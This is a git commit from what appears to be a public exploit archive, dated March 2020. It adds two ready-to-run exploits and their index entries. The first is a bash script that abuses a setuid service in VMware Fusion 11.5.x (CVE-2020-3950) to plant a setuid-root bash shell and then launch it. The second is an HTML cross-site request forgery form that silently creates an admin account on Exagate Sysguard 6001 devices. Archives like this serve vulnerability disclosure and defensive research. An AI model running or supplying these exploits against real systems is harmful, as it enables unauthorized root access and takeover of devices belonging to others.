DB: 2020-03-21
2 changes to exploits/shellcodes VMware Fusion 11.5.2 - Privilege Escalation Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
parent
26b38131c0
commit
d3992973f1
3 changed files with 64 additions and 0 deletions
43
exploits/macos/local/48235.sh
Executable file
43
exploits/macos/local/48235.sh
Executable file
|
@ -0,0 +1,43 @@
|
|||
# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation
|
||||
# Date: 2020-03-17
|
||||
# Exploit Author: Rich Mirch
|
||||
# Vendor Homepage: https://www.vmware.com/products/fusion.html
|
||||
# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
|
||||
# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
|
||||
# Versions:
|
||||
# VMware Fusion Professional 11.5.1 (15018442)
|
||||
# VMware Fusion Professional 11.5.2 (15794494)
|
||||
#
|
||||
# Tested on: macOS 10.14.6
|
||||
# CVE : CVE-2020-3950
|
||||
# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
|
||||
#
|
||||
#
|
||||
#!/bin/bash
|
||||
echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"
|
||||
|
||||
mkdir -p ~/a/b/c
|
||||
mkdir -p ~/Contents/Library/services
|
||||
|
||||
cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
|
||||
#!/usr/bin/python
|
||||
import os
|
||||
os.setuid(0)
|
||||
os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
|
||||
EOF
|
||||
|
||||
chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service
|
||||
|
||||
cd ~/a/b/c
|
||||
ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
|
||||
"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
|
||||
p=$!
|
||||
echo "Sleeping for 5 seconds"
|
||||
sleep 5
|
||||
kill ${p?}
|
||||
wait
|
||||
|
||||
echo "Sleeping for 7 seconds"
|
||||
sleep 7
|
||||
|
||||
$HOME/.woot -p
|
19
exploits/php/webapps/48234.txt
Normal file
19
exploits/php/webapps/48234.txt
Normal file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
|
||||
# Exploit Author: Metin Yunus Kandemir
|
||||
# Vendor Homepage: https://www.exagate.com/
|
||||
# Software Link: https://www.exagate.com/sysguard-6001
|
||||
# Version: SYSGuard 6001
|
||||
|
||||
HTML CSRF PoC :
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://target/kulyon.php" method="POST">
|
||||
<input type="hidden" name="username" value="joke" />
|
||||
<input type="hidden" name="password" value="159384" />
|
||||
<input type="hidden" name="privilege" value="0" />
|
||||
<input type="hidden" name="button" value="Ekle" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
|
@ -10994,6 +10994,7 @@ id,file,description,date,author,type,platform,port
|
|||
48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows,
|
||||
48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,
|
||||
48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
|
||||
48235,exploits/macos/local/48235.sh,"VMware Fusion 11.5.2 - Privilege Escalation",2020-03-20,"Rich Mirch",local,macos,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -42484,3 +42485,4 @@ id,file,description,date,author,type,platform,port
|
|||
48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
|
||||
48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
|
||||
48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
|
||||
48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue